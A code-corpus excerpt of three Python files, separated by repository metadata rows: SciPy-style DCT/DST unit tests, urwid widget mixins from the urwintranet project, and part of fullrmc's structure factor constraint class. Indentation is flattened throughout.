# Test correspondance with matlab (orthornomal mode).
for i in range(len(X)):
dt = np.result_type(np.float32, self.rdt)
x = np.array(X[i], dtype=dt)
yr = Y[i]
y = dct(x, norm="ortho", type=2)
assert_equal(y.dtype, dt)
assert_array_almost_equal(y, yr, decimal=self.dec)
class _TestDCTIIIBase(_TestDCTBase):
def test_definition_ortho(self):
# Test orthornomal mode.
for i in range(len(X)):
x = np.array(X[i], dtype=self.rdt)
dt = np.result_type(np.float32, self.rdt)
y = dct(x, norm='ortho', type=2)
xi = dct(y, norm="ortho", type=3)
assert_equal(xi.dtype, dt)
assert_array_almost_equal(xi, x, decimal=self.dec)
class TestDCTIDouble(_TestDCTBase):
def setUp(self):
self.rdt = np.double
self.dec = 10
self.type = 1
class TestDCTIFloat(_TestDCTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 5
self.type = 1
class TestDCTIInt(_TestDCTBase):
def setUp(self):
self.rdt = int
self.dec = 5
self.type = 1
class TestDCTIIDouble(_TestDCTIIBase):
def setUp(self):
self.rdt = np.double
self.dec = 10
self.type = 2
class TestDCTIIFloat(_TestDCTIIBase):
def setUp(self):
self.rdt = np.float32
self.dec = 5
self.type = 2
class TestDCTIIInt(_TestDCTIIBase):
def setUp(self):
self.rdt = int
self.dec = 5
self.type = 2
class TestDCTIIIDouble(_TestDCTIIIBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 3
class TestDCTIIIFloat(_TestDCTIIIBase):
def setUp(self):
self.rdt = np.float32
self.dec = 5
self.type = 3
class TestDCTIIIInt(_TestDCTIIIBase):
def setUp(self):
self.rdt = int
self.dec = 5
self.type = 3
class _TestIDCTBase(TestCase):
def setUp(self):
self.rdt = None
self.dec = 14
self.type = None
def test_definition(self):
for i in FFTWDATA_SIZES:
xr, yr, dt = fftw_dct_ref(self.type, i, self.rdt)
x = idct(yr, type=self.type)
if self.type == 1:
x /= 2 * (i - 1)
else:
x /= 2 * i
assert_equal(x.dtype, dt)
# XXX: we divide by np.max(y) because the tests fail otherwise. We
# should really use something like assert_array_approx_equal. The
# difference is due to fftw using a better algorithm w.r.t error
# propagation compared to the ones from fftpack.
assert_array_almost_equal(x / np.max(x), xr / np.max(x), decimal=self.dec,
err_msg="Size %d failed" % i)
class TestIDCTIDouble(_TestIDCTBase):
def setUp(self):
self.rdt = np.double
self.dec = 10
self.type = 1
class TestIDCTIFloat(_TestIDCTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 4
self.type = 1
class TestIDCTIInt(_TestIDCTBase):
def setUp(self):
self.rdt = int
self.dec = 4
self.type = 1
class TestIDCTIIDouble(_TestIDCTBase):
def setUp(self):
self.rdt = np.double
self.dec = 10
self.type = 2
class TestIDCTIIFloat(_TestIDCTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 5
self.type = 2
class TestIDCTIIInt(_TestIDCTBase):
def setUp(self):
self.rdt = int
self.dec = 5
self.type = 2
class TestIDCTIIIDouble(_TestIDCTBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 3
class TestIDCTIIIFloat(_TestIDCTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 5
self.type = 3
class TestIDCTIIIInt(_TestIDCTBase):
def setUp(self):
self.rdt = int
self.dec = 5
self.type = 3
class _TestDSTBase(TestCase):
def setUp(self):
self.rdt = None # dtype
self.dec = None # number of decimals to match
self.type = None # dst type
def test_definition(self):
for i in FFTWDATA_SIZES:
xr, yr, dt = fftw_dst_ref(self.type, i, self.rdt)
y = dst(xr, type=self.type)
assert_equal(y.dtype, dt)
# XXX: we divide by np.max(y) because the tests fail otherwise. We
# should really use something like assert_array_approx_equal. The
# difference is due to fftw using a better algorithm w.r.t error
# propagation compared to the ones from fftpack.
assert_array_almost_equal(y / np.max(y), yr / np.max(y), decimal=self.dec,
err_msg="Size %d failed" % i)
class TestDSTIDouble(_TestDSTBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 1
class TestDSTIFloat(_TestDSTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 5
self.type = 1
class TestDSTIInt(_TestDSTBase):
def setUp(self):
self.rdt = int
self.dec = 5
self.type = 1
class TestDSTIIDouble(_TestDSTBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 2
class TestDSTIIFloat(_TestDSTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 6
self.type = 2
class TestDSTIIInt(_TestDSTBase):
def setUp(self):
self.rdt = int
self.dec = 6
self.type = 2
class TestDSTIIIDouble(_TestDSTBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 3
class TestDSTIIIFloat(_TestDSTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 7
self.type = 3
class TestDSTIIIInt(_TestDSTBase):
def setUp(self):
self.rdt = int
self.dec = 7
self.type = 3
class _TestIDSTBase(TestCase):
def setUp(self):
self.rdt = None
self.dec = None
self.type = None
def test_definition(self):
for i in FFTWDATA_SIZES:
xr, yr, dt = fftw_dst_ref(self.type, i, self.rdt)
x = idst(yr, type=self.type)
if self.type == 1:
x /= 2 * (i + 1)
else:
x /= 2 * i
assert_equal(x.dtype, dt)
# XXX: we divide by np.max(x) because the tests fail otherwise. We
# should really use something like assert_array_approx_equal. The
# difference is due to fftw using a better algorithm w.r.t error
# propagation compared to the ones from fftpack.
assert_array_almost_equal(x / np.max(x), xr / np.max(x), decimal=self.dec,
err_msg="Size %d failed" % i)
class TestIDSTIDouble(_TestIDSTBase):
def setUp(self):
self.rdt = np.double
self.dec = 12
self.type = 1
class TestIDSTIFloat(_TestIDSTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 4
self.type = 1
class TestIDSTIInt(_TestIDSTBase):
def setUp(self):
self.rdt = int
self.dec = 4
self.type = 1
class TestIDSTIIDouble(_TestIDSTBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 2
class TestIDSTIIFloat(_TestIDSTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 6
self.type = 2
class TestIDSTIIInt(_TestIDSTBase):
def setUp(self):
self.rdt = int
self.dec = 6
self.type = 2
class TestIDSTIIIDouble(_TestIDSTBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 3
class TestIDSTIIIFloat(_TestIDSTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 6
self.type = 3
class TestIDSTIIIInt(_TestIDSTBase):
def setUp(self):
self.rdt = int
self.dec = 6
self.type = 3
class TestOverwrite(object):
"""Check input overwrite behavior """
real_dtypes = [np.float32, np.float64]
def _check(self, x, routine, type, fftsize, axis, norm, overwrite_x,
should_overwrite, **kw):
x2 = x.copy()
routine(x2, type, fftsize, axis, norm, overwrite_x=overwrite_x)
sig = "%s(%s%r, %r, axis=%r, overwrite_x=%r)" % (
routine.__name__, x.dtype, x.shape, fftsize, axis, overwrite_x)
if not should_overwrite:
assert_equal(x2, x, err_msg="spurious overwrite in %s" % sig)
def _check_1d(self, routine, dtype, shape, axis, overwritable_dtypes):
np.random.seed(1234)
if np.issubdtype(dtype, np.complexfloating):
data = np.random.randn(*shape) + 1j * np.random.randn(*shape)
else:
data = np.random.randn(*shape)
data = data.astype(dtype)
for type in [1, 2, 3]:
for overwrite_x in [True, False]:
for norm in [None, 'ortho']:
if type == 1 and norm == 'ortho':
continue
should_overwrite = (overwrite_x
and dtype in overwritable_dtypes
and (len(shape) == 1 or
(axis % len(shape) == len(shape) - 1
)))
self._check(data, routine, type, None, axis, norm,
overwrite_x, should_overwrite)
def test_dct(self):
overwritable = self.real_dtypes
for dtype in self.real_dtypes:
self._check_1d(dct, dtype, (16,), -1, overwritable)
self._check_1d(dct, dtype, (16, 2), 0, overwritable)
self._check_1d(dct, dtype, (2, 16), 1, overwritable)
def test_idct(self):
overwritable = self.real_dtypes
for dtype in self.real_dtypes:
self._check_1d(idct, dtype, (16,), -1, overwritable)
self._check_1d(idct, dtype, (16, 2), 0, overwritable)
self._check_1d(idct, dtype, (2, 16), 1, overwritable)
def test_dst(self):
overwritable = self.real_dtypes
for dtype in self.real_dtypes:
self._check_1d(dst, dtype, (16,), -1, overwritable)
self._check_1d(dst, dtype, (16, 2), 0, overwritable)
self._check_1d(dst, dtype, (2, 16), 1, overwritable)
def test_idst(self):
overwritable = self.real_dtypes
for dtype in self.real_dtypes:
self._check_1d(idst, dtype, (16,), -1, overwritable)
self._check_1d(idst, dtype, (16, 2), 0, overwritable)
self._check_1d(idst, dtype, (2, 16), 1, overwritable)
if __name__ == "__main__":
np.testing.run_module_suite()
| mit | -2,302,924,072,416,488,400 | 27.3327 | 86 | 0.551902 | false | 3.291299 | true | false | false |
jespino/urwintranet | urwintranet/ui/widgets/mixins.py | 1 | 3127 | # -*- coding: utf-8 -*-
"""
urwintranet.ui.widgets.mixins
~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
import urwid
class IgnoreKeyPressMixin(object):
def keypress(self, size, key):
return key
class KeyPressMixin(object):
signals = ["click"]
def keypress(self, size, key):
"""
Send 'click' signal on 'activate' command.
>>> assert Button._command_map[' '] == 'activate'
>>> assert Button._command_map['enter'] == 'activate'
>>> size = (15,)
>>> b = Button("Cancel")
>>> clicked_buttons = []
>>> def handle_click(button):
... clicked_buttons.append(button.label)
>>> connect_signal(b, 'click', handle_click)
>>> b.keypress(size, 'enter')
>>> b.keypress(size, ' ')
>>> clicked_buttons # ... = u in Python 2
[...'Cancel', ...'Cancel']
"""
if self._command_map[key] != urwid.ACTIVATE:
return key
self._emit('click')
def mouse_event(self, size, event, button, x, y, focus):
"""
Send 'click' signal on button 1 press.
>>> size = (15,)
>>> b = Button("Ok")
>>> clicked_buttons = []
>>> def handle_click(button):
... clicked_buttons.append(button.label)
>>> connect_signal(b, 'click', handle_click)
>>> b.mouse_event(size, 'mouse press', 1, 4, 0, True)
True
>>> b.mouse_event(size, 'mouse press', 2, 4, 0, True) # ignored
False
>>> clicked_buttons # ... = u in Python 2
[...'Ok']
"""
if button != 1 or not urwid.util.is_mouse_press(event):
return False
self._emit('click')
return True
class FormMixin(object):
FORM_KEYS = {
"tab": "down",
"shift tab": "up",
}
def keypress(self, size, key):
key = self.FORM_KEYS.get(key, key)
return super().keypress(size, key)
class ViMotionMixin(object):
VI_KEYS = {
"j": "down",
"k": "up",
"h": "left",
"l": "right",
}
def keypress(self, size, key):
key = self.VI_KEYS.get(key, key)
return super().keypress(size, key)
class EmacsMotionMixin(object):
EMACS_KEYS = {
"ctrl n": "down",
"ctrl p": "up",
"ctrl b": "left",
"ctrl f": "right",
}
def keypress(self, size, key):
key = self.EMACS_KEYS.get(key, key)
return super().keypress(size, key)
class NotifierMixin(object):
ERROR_PREFIX = ""
ERROR_ATTR = "error"
INFO_PREFIX = ""
INFO_ATTR = "info"
ALIGN = "center"
def error_msg(self, text):
self.set_text((self.ERROR_ATTR, self.ERROR_PREFIX + text))
self.set_align_mode(self.ALIGN)
def info_msg(self, text):
self.set_text((self.INFO_ATTR, self.INFO_PREFIX + text))
self.set_align_mode(self.ALIGN)
def clear_msg(self):
self.set_text("")
class PlainButtonMixin(object):
button_left = urwid.Text("")
button_right = urwid.Text("")
class NonSelectableMixin(object):
def selectable(self):
return False
| apache-2.0 | 4,975,754,046,936,183,000 | 24.016 | 71 | 0.523825 | false | 3.505605 | false | false | false |
bachiraoun/fullrmc | Constraints/StructureFactorConstraints.py | 1 | 64342 | """
StructureFactorConstraints contains classes for all constraints related experimental static structure factor functions.
.. inheritance-diagram:: fullrmc.Constraints.StructureFactorConstraints
:parts: 1
"""
# standard libraries imports
from __future__ import print_function
import itertools, re
# external libraries imports
import numpy as np
from pdbparser.Utilities.Database import is_element_property, get_element_property
from pdbparser.Utilities.Collection import get_normalized_weighting
# fullrmc imports
from ..Globals import INT_TYPE, FLOAT_TYPE, PI, PRECISION, LOGGER
from ..Globals import str, long, unicode, bytes, basestring, range, xrange, maxint
from ..Core.Collection import is_number, is_integer, get_path
from ..Core.Collection import reset_if_collected_out_of_date, get_real_elements_weight
from ..Core.Collection import get_caller_frames
from ..Core.Constraint import Constraint, ExperimentalConstraint
from ..Core.pairs_histograms import multiple_pairs_histograms_coords, full_pairs_histograms_coords
class StructureFactorConstraint(ExperimentalConstraint):
"""
Controls the Structure Factor noted as S(Q) and also called
total-scattering structure function or Static Structure Factor.
S(Q) is a dimensionless quantity and normalized such as the average
value :math:`<S(Q)>=1`.
    It is worth mentioning that S(Q) is nothing other than the normalized and
    corrected diffraction pattern once all experimental artefacts have been
    accounted for.
The computation of S(Q) is done through an inverse Sine Fourier transform
of the computed pair distribution function G(r).
.. math::
S(Q) = 1+ \\frac{1}{Q} \\int_{0}^{\\infty} G(r) sin(Qr) dr
From an atomistic model and histogram point of view, G(r) is computed as
    follows:
.. math::
G(r) = 4 \\pi r (\\rho_{r} - \\rho_{0})
= 4 \\pi \\rho_{0} r (g(r)-1)
= \\frac{R(r)}{r} - 4 \\pi \\rho_{0}
    g(r) is calculated after binning all pair atomic distances into
    weighted histograms as follows:
.. math::
g(r) = \\sum \\limits_{i,j}^{N} w_{i,j} \\frac{\\rho_{i,j}(r)}{\\rho_{0}}
= \\sum \\limits_{i,j}^{N} w_{i,j} \\frac{n_{i,j}(r) / v(r)}{N_{i,j} / V}
Where:\n
:math:`Q` is the momentum transfer. \n
:math:`r` is the distance between two atoms. \n
:math:`\\rho_{i,j}(r)` is the pair density function of atoms i and j. \n
:math:`\\rho_{0}` is the average number density of the system. \n
:math:`w_{i,j}` is the relative weighting of atom types i and j. \n
:math:`R(r)` is the radial distribution function (rdf). \n
:math:`N` is the total number of atoms. \n
:math:`V` is the volume of the system. \n
:math:`n_{i,j}(r)` is the number of atoms i neighbouring j at a distance r. \n
:math:`v(r)` is the annulus volume at distance r and of thickness dr. \n
:math:`N_{i,j}` is the total number of atoms i and j in the system. \n
+----------------------------------------------------------------------+
|.. figure:: reduced_structure_factor_constraint_plot_method.png |
| :width: 530px |
| :height: 400px |
| :align: left |
| |
| Reduced structure factor of memory shape Nickel-Titanium alloy. |
+----------------------------------------------------------------------+
:Parameters:
#. experimentalData (numpy.ndarray, string): Experimental data as
numpy.ndarray or string path to load data using numpy.loadtxt
method.
#. dataWeights (None, numpy.ndarray): Weights array of the same number
of points of experimentalData used in the constraint's standard
error computation. Therefore particular fitting emphasis can be
put on different data points that might be considered as more or less
           important in order to get a reasonable and plausible model.\n
If None is given, all data points are considered of the same
importance in the computation of the constraint's standard error.\n
If numpy.ndarray is given, all weights must be positive and all
           zero-weighted data points won't contribute to the total
           constraint's standard error. At least a single weight point is
           required to be non-zero and the weights array will be automatically
           scaled upon setting such that the sum of all the weights
is equal to the number of data points.
#. weighting (string): The elements weighting scheme. It must be any
atomic attribute (atomicNumber, neutronCohb, neutronIncohb,
neutronCohXs, neutronIncohXs, atomicWeight, covalentRadius) defined
in pdbparser database. In case of xrays or neutrons experimental
weights, one can simply set weighting to 'xrays' or 'neutrons'
and the value will be automatically adjusted to respectively
'atomicNumber' and 'neutronCohb'. If attribute values are
missing in the pdbparser database, atomic weights must be
given in atomsWeight dictionary argument.
#. atomsWeight (None, dict): Atoms weight dictionary where keys are
           atom elements and values are custom weights. If None is given
           or partially given, missing element weights will be fully set
           using the given weighting scheme.
#. rmin (None, number): The minimum distance value to compute G(r)
histogram. If None is given, rmin is computed as
:math:`2 \\pi / Q_{max}`.
#. rmax (None, number): The maximum distance value to compute G(r)
histogram. If None is given, rmax is computed as
:math:`2 \\pi / dQ`.
#. dr (None, number): The distance bin value to compute G(r)
histogram. If None is given, bin is computed as
:math:`2 \\pi / (Q_{max}-Q_{min})`.
#. scaleFactor (number): A normalization scale factor used to normalize
the computed data to the experimental ones.
#. adjustScaleFactor (list, tuple): Used to adjust fit or guess
the best scale factor during stochastic engine runtime.
It must be a list of exactly three entries.\n
#. The frequency in number of generated moves of finding the best
scale factor. If 0 frequency is given, it means that the scale
factor is fixed.
#. The minimum allowed scale factor value.
#. The maximum allowed scale factor value.
#. windowFunction (None, numpy.ndarray): The window function to
convolute with the computed pair distribution function of the
system prior to comparing it with the experimental data. In
general, the experimental pair distribution function G(r) shows
artificial wrinkles, among others the main reason is because
G(r) is computed by applying a sine Fourier transform to the
experimental structure factor S(q). Therefore window function is
used to best imitate the numerical artefacts in the experimental
data.
#. limits (None, tuple, list): The distance limits to compute the
histograms. If None is given, the limits will be automatically
set the the min and max distance of the experimental data.
Otherwise, a tuple of exactly two items where the first is the
minimum distance or None and the second is the maximum distance
or None.
**NB**: If adjustScaleFactor first item (frequency) is 0, the scale factor
will remain untouched and the limits minimum and maximum won't be checked.
.. code-block:: python
# import fullrmc modules
from fullrmc.Engine import Engine
from fullrmc.Constraints.StructureFactorConstraints import StructureFactorConstraint
# create engine
ENGINE = Engine(path='my_engine.rmc')
# set pdb file
ENGINE.set_pdb('system.pdb')
# create and add constraint
SFC = StructureFactorConstraint(experimentalData="sq.dat", weighting="atomicNumber")
ENGINE.add_constraints(SFC)
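        # run the stochastic engine (illustrative call; the argument names
        # below follow typical fullrmc usage and may need adjusting)
        ENGINE.run(numberOfSteps=100000, saveFrequency=1000)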
"""
def __init__(self, experimentalData, dataWeights=None,
weighting="atomicNumber", atomsWeight=None,
rmin=None, rmax=None, dr=None,
scaleFactor=1.0, adjustScaleFactor=(0, 0.8, 1.2),
windowFunction=None, limits=None):
# initialize variables
self.__experimentalQValues = None
self.__experimentalSF = None
self.__rmin = None
self.__rmax = None
self.__dr = None
self.__minimumDistance = None
self.__maximumDistance = None
self.__bin = None
self.__shellCenters = None
self.__histogramSize = None
self.__shellVolumes = None
self.__Gr2SqMatrix = None
# initialize constraint
super(StructureFactorConstraint, self).__init__( experimentalData=experimentalData, dataWeights=dataWeights, scaleFactor=scaleFactor, adjustScaleFactor=adjustScaleFactor)
# set atomsWeight
self.set_atoms_weight(atomsWeight)
# set elements weighting
self.set_weighting(weighting)
self.__set_weighting_scheme()
# set window function
self.set_window_function(windowFunction)
# set r parameters
self.set_rmin(rmin)
self.set_rmax(rmax)
self.set_dr(dr)
# set frame data
FRAME_DATA = [d for d in self.FRAME_DATA]
FRAME_DATA.extend(['_StructureFactorConstraint__experimentalQValues',
'_StructureFactorConstraint__experimentalSF',
'_StructureFactorConstraint__elementsPairs',
'_StructureFactorConstraint__weightingScheme',
'_StructureFactorConstraint__atomsWeight',
'_StructureFactorConstraint__qmin',
'_StructureFactorConstraint__qmax',
'_StructureFactorConstraint__rmin',
'_StructureFactorConstraint__rmax',
'_StructureFactorConstraint__dr',
'_StructureFactorConstraint__minimumDistance',
'_StructureFactorConstraint__maximumDistance',
'_StructureFactorConstraint__bin',
'_StructureFactorConstraint__shellCenters',
'_StructureFactorConstraint__histogramSize',
'_StructureFactorConstraint__shellVolumes',
'_StructureFactorConstraint__Gr2SqMatrix',
'_StructureFactorConstraint__windowFunction',
'_elementsWeight',] )
RUNTIME_DATA = [d for d in self.RUNTIME_DATA]
RUNTIME_DATA.extend( [] )
object.__setattr__(self, 'FRAME_DATA', tuple(FRAME_DATA) )
object.__setattr__(self, 'RUNTIME_DATA', tuple(RUNTIME_DATA) )
def _codify_update__(self, name='constraint', addDependencies=True):
dependencies = []
code = []
if addDependencies:
code.extend(dependencies)
dw = self.dataWeights
if dw is not None:
dw = list(dw)
code.append("dw = {dw}".format(dw=dw))
wf = self.windowFunction
if isinstance(wf, np.ndarray):
code.append("wf = np.array({wf})".format(wf=list(wf)))
else:
code.append("wf = {wf}".format(wf=wf))
code.append("{name}.set_used({val})".format(name=name, val=self.used))
code.append("{name}.set_scale_factor({val})".format(name=name, val=self.scaleFactor))
code.append("{name}.set_adjust_scale_factor({val})".format(name=name, val=self.adjustScaleFactor))
code.append("{name}.set_data_weights(dw)".format(name=name))
code.append("{name}.set_atoms_weight({val})".format(name=name, val=self.atomsWeight))
code.append("{name}.set_window_function(wf)".format(name=name))
code.append("{name}.set_rmin({val})".format(name=name, val=self.rmin))
code.append("{name}.set_rmax({val})".format(name=name, val=self.rmax))
code.append("{name}.set_dr({val})".format(name=name, val=self.dr))
code.append("{name}.set_limits({val})".format(name=name, val=self.limits))
# return
return dependencies, '\n'.join(code)
def _codify__(self, engine, name='constraint', addDependencies=True):
assert isinstance(name, basestring), LOGGER.error("name must be a string")
assert re.match('[a-zA-Z_][a-zA-Z0-9_]*$', name) is not None, LOGGER.error("given name '%s' can't be used as a variable name"%name)
klass = self.__class__.__name__
dependencies = ['import numpy as np','from fullrmc.Constraints import StructureFactorConstraints']
code = []
if addDependencies:
code.extend(dependencies)
x = list(self.experimentalData[:,0])
y = list(self.experimentalData[:,1])
code.append("x = {x}".format(x=x))
code.append("y = {y}".format(y=y))
code.append("d = np.transpose([x,y]).astype(np.float32)")
dw = self.dataWeights
if dw is not None:
dw = list(dw)
code.append("dw = {dw}".format(dw=dw))
wf = self.windowFunction
if isinstance(wf, np.ndarray):
code.append("wf = np.array({wf})".format(wf=list(wf)))
else:
code.append("wf = {wf}".format(wf=wf))
code.append("{name} = {klass}s.{klass}\
(experimentalData=d, dataWeights=dw, weighting='{weighting}', atomsWeight={atomsWeight}, \
rmin={rmin}, rmax={rmax}, dr={dr}, scaleFactor={scaleFactor}, adjustScaleFactor={adjustScaleFactor}, \
windowFunction=wf, limits={limits})".format(name=name, klass=klass,
weighting=self.weighting, atomsWeight=self.atomsWeight, rmin=self.rmin,
rmax=self.rmax, dr=self.dr, scaleFactor=self.scaleFactor,
adjustScaleFactor=self.adjustScaleFactor, limits=self.limits))
code.append("{engine}.add_constraints([{name}])".format(engine=engine, name=name))
# return
return dependencies, '\n'.join(code)
#def __getstate__(self):
# # make sure that __Gr2SqMatrix is not pickled but saved to the disk as None
# state = super(StructureFactorConstraint, self).__getstate__()
# state["_StructureFactorConstraint__Gr2SqMatrix"] = None
# return state
#
#def __setstate__(self, state):
# # make sure to regenerate G(r) to S(q) matrix at loading time
# self.__dict__.update( state )
# self.__set_Gr_2_Sq_matrix()
#
def __set_Gr_2_Sq_matrix(self):
if self.__experimentalQValues is None or self.__shellCenters is None:
self.__Gr2SqMatrix = None
else:
Qs = self.__experimentalQValues
Rs = self.__shellCenters
dr = self.__shellCenters[1]-self.__shellCenters[0]
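            # build the discretized sine Fourier kernel so that S(Q) can be
            # obtained as a single matrix product over the histogram bins:
            # S(Q) = 1 + sum_r G(r)*sin(Q*r)/Q * dr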
qr = Rs.reshape((-1,1))*(np.ones((len(Rs),1), dtype=FLOAT_TYPE)*Qs)
sinqr = np.sin(qr)
sinqr_q = sinqr/Qs
self.__Gr2SqMatrix = dr*sinqr_q
def __set_weighting_scheme(self):
if self.engine is not None:
self.__elementsPairs = sorted(itertools.combinations_with_replacement(self.engine.elements,2))
#elementsWeight = dict([(el,float(get_element_property(el,self.__weighting))) for el in self.engine.elements])
#self._elementsWeight = dict([(el,self.__atomsWeight.get(el, float(get_element_property(el,self.__weighting)))) for el in self.engine.elements])
self._elementsWeight = get_real_elements_weight(elements=self.engine.elements, weightsDict=self.__atomsWeight, weighting=self.__weighting)
self.__weightingScheme = get_normalized_weighting(numbers=self.engine.numberOfAtomsPerElement, weights=self._elementsWeight)
for k in self.__weightingScheme:
self.__weightingScheme[k] = FLOAT_TYPE(self.__weightingScheme[k])
else:
self.__elementsPairs = None
self.__weightingScheme = None
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__elementsPairs' : self.__elementsPairs,
'_StructureFactorConstraint__weightingScheme': self.__weightingScheme})
def __set_histogram(self):
if self.__minimumDistance is None or self.__maximumDistance is None or self.__bin is None:
self.__shellCenters = None
self.__histogramSize = None
self.__shellVolumes = None
else:
# compute edges
if self.engine is not None and self.rmax is None:
minHalfBox = np.min( [np.linalg.norm(v)/2. for v in self.engine.basisVectors])
self.__edges = np.arange(self.__minimumDistance,minHalfBox, self.__bin).astype(FLOAT_TYPE)
else:
self.__edges = np.arange(self.__minimumDistance, self.__maximumDistance+self.__bin, self.__bin).astype(FLOAT_TYPE)
# adjust rmin and rmax
self.__minimumDistance = self.__edges[0]
self.__maximumDistance = self.__edges[-1]
# compute shellCenters
self.__shellCenters = (self.__edges[0:-1]+self.__edges[1:])/FLOAT_TYPE(2.)
# set histogram size
self.__histogramSize = INT_TYPE( len(self.__edges)-1 )
# set shell centers and volumes
self.__shellVolumes = FLOAT_TYPE(4.0/3.)*PI*((self.__edges[1:])**3 - self.__edges[0:-1]**3)
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__minimumDistance': self.__minimumDistance,
'_StructureFactorConstraint__maximumDistance': self.__maximumDistance,
'_StructureFactorConstraint__shellCenters' : self.__shellCenters,
'_StructureFactorConstraint__histogramSize' : self.__histogramSize,
'_StructureFactorConstraint__shellVolumes' : self.__shellVolumes})
# reset constraint
self.reset_constraint()
# reset sq matrix
self.__set_Gr_2_Sq_matrix()
def _on_collector_reset(self):
pass
@property
def rmin(self):
""" Histogram minimum distance. """
return self.__rmin
@property
def rmax(self):
""" Histogram maximum distance. """
return self.__rmax
@property
def dr(self):
""" Histogram bin size."""
return self.__dr
@property
def bin(self):
""" Computed histogram distance bin size."""
return self.__bin
@property
def minimumDistance(self):
""" Computed histogram minimum distance. """
return self.__minimumDistance
@property
def maximumDistance(self):
""" Computed histogram maximum distance. """
return self.__maximumDistance
@property
def qmin(self):
""" Experimental data reciprocal distances minimum. """
return self.__qmin
@property
def qmax(self):
""" Experimental data reciprocal distances maximum. """
return self.__qmax
@property
def dq(self):
""" Experimental data reciprocal distances bin size. """
return self.__experimentalQValues[1]-self.__experimentalQValues[0]
@property
def experimentalQValues(self):
""" Experimental data used q values. """
return self.__experimentalQValues
@property
def histogramSize(self):
""" Histogram size"""
return self.__histogramSize
@property
def shellCenters(self):
""" Shells center array"""
return self.__shellCenters
@property
def shellVolumes(self):
""" Shells volume array"""
return self.__shellVolumes
@property
def experimentalSF(self):
""" Experimental Structure Factor or S(q)"""
return self.__experimentalSF
@property
def elementsPairs(self):
""" Elements pairs """
return self.__elementsPairs
@property
def atomsWeight(self):
"""Custom atoms weight"""
return self.__atomsWeight
@property
def weighting(self):
""" Elements weighting definition. """
return self.__weighting
@property
def weightingScheme(self):
""" Elements weighting scheme. """
return self.__weightingScheme
@property
def windowFunction(self):
""" Convolution window function. """
return self.__windowFunction
@property
def Gr2SqMatrix(self):
""" G(r) to S(q) transformation matrix."""
return self.__Gr2SqMatrix
@property
def _experimentalX(self):
"""For internal use only to interface
ExperimentalConstraint.get_constraints_properties"""
return self.__experimentalQValues
@property
def _experimentalY(self):
"""For internal use only to interface
ExperimentalConstraint.get_constraints_properties"""
return self.__experimentalSF
@property
def _modelX(self):
"""For internal use only to interface
ExperimentalConstraint.get_constraints_properties"""
return self.__experimentalQValues
def listen(self, message, argument=None):
"""
Listens to any message sent from the Broadcaster.
:Parameters:
#. message (object): Any python object to send to constraint's
listen method.
#. argument (object): Any type of argument to pass to the
listeners.
"""
if message in ("engine set","update pdb","update molecules indexes","update elements indexes","update names indexes"):
self.__set_weighting_scheme()
# reset histogram
if self.engine is not None:
self.__set_histogram()
self.reset_constraint() # ADDED 2017-JAN-08
elif message in("update boundary conditions",):
self.reset_constraint()
def set_rmin(self, rmin):
"""
Set rmin value.
:parameters:
#. rmin (None, number): The minimum distance value to compute G(r)
histogram. If None is given, rmin is computed as
:math:`2 \\pi / Q_{max}`.
"""
if rmin is None:
minimumDistance = FLOAT_TYPE( 2.*PI/self.__qmax )
else:
assert is_number(rmin), LOGGER.error("rmin must be None or a number")
minimumDistance = FLOAT_TYPE(rmin)
if self.__maximumDistance is not None:
assert minimumDistance<self.__maximumDistance, LOGGER.error("rmin must be smaller than rmax %s"%self.__maximumDistance)
self.__rmin = rmin
self.__minimumDistance = minimumDistance
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__rmin': self.__rmin,
'_StructureFactorConstraint__minimumDistance': self.__minimumDistance})
# reset histogram
self.__set_histogram()
def set_rmax(self, rmax):
"""
Set rmax value.
:Parameters:
#. rmax (None, number): The maximum distance value to compute G(r)
histogram. If None is given, rmax is computed as
:math:`2 \\pi / dQ`.
"""
if rmax is None:
dq = self.__experimentalQValues[1]-self.__experimentalQValues[0]
maximumDistance = FLOAT_TYPE( 2.*PI/dq )
else:
assert is_number(rmax), LOGGER.error("rmax must be None or a number")
maximumDistance = FLOAT_TYPE(rmax)
if self.__minimumDistance is not None:
assert maximumDistance>self.__minimumDistance, LOGGER.error("rmax must be bigger than rmin %s"%self.__minimumDistance)
self.__rmax = rmax
self.__maximumDistance = maximumDistance
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__rmax': self.__rmax,
'_StructureFactorConstraint__maximumDistance': self.__maximumDistance})
# reset histogram
self.__set_histogram()
def set_dr(self, dr):
"""
Set dr value.
:Parameters:
#. dr (None, number): The distance bin value to compute G(r)
histogram. If None is given, bin is computed as
:math:`2 \\pi / (Q_{max}-Q_{min})`.
"""
if dr is None:
bin = 2.*PI/self.__qmax
rbin = round(bin,1)
if rbin>bin:
rbin -= 0.1
bin = FLOAT_TYPE( rbin )
else:
assert is_number(dr), LOGGER.error("dr must be None or a number")
bin = FLOAT_TYPE(dr)
self.__dr = dr
self.__bin = bin
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__dr': self.__dr,
'_StructureFactorConstraint__bin': self.__bin})
# reset histogram
self.__set_histogram()
def set_weighting(self, weighting):
"""
Set elements weighting. It must be a valid entry of pdbparser atom's
database.
:Parameters:
#. weighting (string): The elements weighting scheme. It must be
any atomic attribute (atomicNumber, neutronCohb, neutronIncohb,
neutronCohXs, neutronIncohXs, atomicWeight, covalentRadius)
defined in pdbparser database. In case of xrays or neutrons
experimental weights, one can simply set weighting to 'xrays'
or 'neutrons' and the value will be automatically adjusted to
